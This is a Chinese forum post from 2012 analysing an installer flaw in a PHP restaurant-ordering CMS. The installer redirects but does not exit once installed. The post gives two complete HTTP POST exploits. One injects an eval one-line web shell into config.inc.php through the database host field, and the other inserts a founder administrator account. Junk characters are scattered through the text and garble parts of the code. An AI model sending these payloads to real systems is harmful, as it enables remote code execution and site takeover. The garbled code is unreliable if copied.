问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
& Y: P, l" s0 |" j- w" e- D
! F1 _% c% ^% u: w* F# X<?php
8 q8 |; o3 m' A+ _8 C9 `if(file_exists("../install.lock"))
: |9 X0 c& ^6 c" v8 y/ L{
! S0 h' Q9 q- U' F. Y$ M% ]: Q header("Location: ../");//没有退出
* m# \4 l. `: Q- J$ B0 B}
& Z. H. ~1 l3 ~) Y6 Q
% [, G2 h; B$ [4 i( @, |7 [% G//echo 'tst';exit;. q+ {) F- ~/ P2 p. H2 N- R! w6 ^
require_once("init.php");
5 F/ Z8 M& W7 D9 F. x+ Jif(empty($_REQUEST['step']) || $_REQUEST['step']==1)3 I& K# i4 ~; [( B% C+ c
{
. ?. V+ L% v( U9 d, I! k2 X可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
1 q+ r/ k f% a! R8 q( ~0 r. y5 l& }% p$ h ] q
1、getshell(很危险)8 i+ [) T( J' s
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)1 M- d0 _1 F, g7 ?: \) L x0 N: a
{
% G( V4 \8 Z x% s! j$smarty->assign("step",1);7 H; [/ A8 w1 H5 z% Y6 v
$smarty->display("index.html");
! e5 \4 y$ h, C9 T}elseif($_REQUEST['step']==2)8 ^! n+ {# ?* I# h) ^" c
{
+ O: f# e! _" l' ?9 r3 J $mysql_host=trim($_POST['mysql_host']);
' C& r _3 p3 \1 q% k $mysql_user=trim($_POST['mysql_user']);
6 M+ G* [1 ?( h" \! }5 w $mysql_pwd=trim($_POST['mysql_pwd']);! Z: t+ B2 O" K: b4 {' x8 m
$mysql_db=trim($_POST['mysql_db']);5 N- |7 l- j1 K K% W
$tblpre=trim($_POST['tblpre']);6 i8 Z$ `0 K9 S* a8 G) t
$domain==trim($_POST['domain']); C3 P, E5 g. M) H* L# D
$str="<?php \r\n";
! c. k1 j8 c6 t6 l) A $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
0 p' } k* J" Y& G y( _ $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";; ]. p1 z, u, Q
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";& y9 R( G2 T, {* t
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n"; r$ O3 h3 a. H7 h* O1 ?
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
! f0 U' Z1 Z3 F, k% b* | $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
! j% \8 l: d$ [# ^7 Z! C( Q $str.='define("DOMAIN","'.$domain.'");'."\r\n";' ?1 V( S9 J$ x R
$str.='define("SKINS","default");'."\r\n";
& G$ n- Y( M5 h a+ a5 R1 d( ~ $str.='?>';
' s* P1 p* I5 r5 [% t4 G file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件) x3 N$ g4 o1 P: a6 {
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
3 [8 T+ p" S# p A& _0 OPOST /canting/install/index.php?m=index&step=2 HTTP/1.1& s& D; o! w/ f: m
Host: 192.168.80.129
) i X+ {5 E, P. O- t- Q8 p. hUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
1 A$ w5 F2 U8 J! hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
3 @. J5 @. F3 ?- i. a) nAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3* ~: O8 H/ `1 `. W/ Q
Accept-Encoding: gzip, deflate8 N' w; U# Y9 n$ d# P, r: C! P% F
Referer: http://192.168.80.129/canting/install/index.php?step=1+ m, f6 J6 T3 c" @1 t9 U
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
+ c; Z3 o* D) v% a5 l9 Q9 C+ dContent-Type: application/x-www-form-urlencoded N% u$ H: K% ~: p0 F
Content-Length: 126
4 u; w* T6 r% Q- V p" @' A7 p
1 i* f3 ~! \- @- i5 n! I/ smysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD3 ~; _2 k$ i; H& ?4 M- i$ b
但是这个方法很危险,将导致网站无法运行。
6 Y9 i% s% I3 ^4 Q2 L. B# A; W. j( F# ~6 {$ x1 A% e& O
2、直接添加管理员
8 u C# y0 O6 T) o1 T, c) i0 j6 Y/ ]- \- m s3 n0 X
elseif($_REQUEST['step']==5)4 @* z9 v8 l" m2 v1 g" h. C7 R1 W
{7 O C' v6 f" J- [" e6 y X
if($_POST)
* B) w& ?) l! ~% b( j { require_once("../config/config.inc.php");* X9 A5 [9 A% u7 n- h
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
7 {5 M0 y+ u6 Q& @1 G$ g3 n. T mysql_select_db(MYSQL_DB,$link);: M4 }4 |: G4 F* m: ^' e5 X! c
mysql_query("SET NAMES ".MYSQL_CHARSET );
! t D; p% @2 S mysql_query("SET sql_mode=''");5 ]$ J, l1 ~! o9 P
2 q; l2 H) p9 t4 L4 }# w) i
$adminname=trim($_POST['adminname']);. _9 l7 W8 e1 d* ~
$pwd1=trim($_POST['pwd1']);- q' d8 F" w7 E) F: ^% X, g2 U; k
$pwd2=trim($_POST['pwd2']);
6 y; F. B7 B8 X: [, Z if(empty($adminname))/ v+ @7 o m Y9 C% S4 _
{9 q& m5 z' R, E9 a: S! Y7 f
9 L7 K' B( a4 f echo "<script>alert('管理员不能为空');history.go(-1);</script>";
) _3 D* e4 C+ T9 u. N" q exit();
) t- J# @) ~' i) ^! R' A }
6 d' p/ ], [: W) Q | if(($pwd1!=$pwd2) or empty($pwd1))3 | V9 E) l3 ^$ u, }' ?' ~
{
/ Y1 C1 {" \8 `, b& V: r$ [& p& C. Y% G echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
. S* J0 ~0 q- i+ t6 ]6 L9 i* Y }7 G+ R! l4 m) n8 g% n# ?
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
/ f$ C7 h- v# V' s* H- C& A }
" c& F9 i/ ?4 |& H! |* `8 S' M% w) S这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:3 w. R5 m9 |/ R# f
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
- K; H5 I2 i% w9 g; t. BHost: 192.168.80.1290 h( C% v6 h& V. _
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
4 C: b. u7 T5 G) N* K: zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
& g& y2 ] Z6 ?& q' zAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
& g. V% D: `1 q( vAccept-Encoding: gzip, deflate
+ F7 Q3 q* N2 D9 H0 i1 {5 G3 d7 b* oReferer: http://www.2cto.com /canting/install/index.php?step=12 L1 }5 @ W _' O% m$ b( j) u( B
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42' q! Q3 P: W M4 x' a, P2 h
Content-Type: application/x-www-form-urlencoded
5 y9 }1 |' I# U5 qContent-Length: 46/ v+ R) b4 p# z; ~4 D- G
K# T+ n' j. @0 {) u+ `1 {- z
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
! G3 J- n5 D* u( k |
发表于 2012-12-4 11:13:44
收藏
支持
反对